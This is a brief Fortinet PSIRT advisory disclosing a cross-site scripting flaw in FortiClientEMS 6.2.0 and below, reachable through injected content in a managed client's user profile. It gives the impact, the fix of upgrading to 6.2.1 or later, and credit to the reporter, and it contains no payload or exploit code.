PSIRT Advisory

XSS vulnerability in FortiClientEMS

Summary

An Improper Neutralization of Input During Web Page Generation in FortiClientEMS may allow a remote attacker to execute unauthorized code by injecting malicious payload in the user profile of a FortiClient instance being managed by the vulnerable system.

Impact

Unauthorized code execution

Affected Products

FortiClientEMS version 6.2.0 and below.

Solutions

Please upgrade to version 6.2.1 and above.

Acknowledgement

Fortinet is pleased to thank Artem Dimitriev for reporting this issue under responsible disclosure.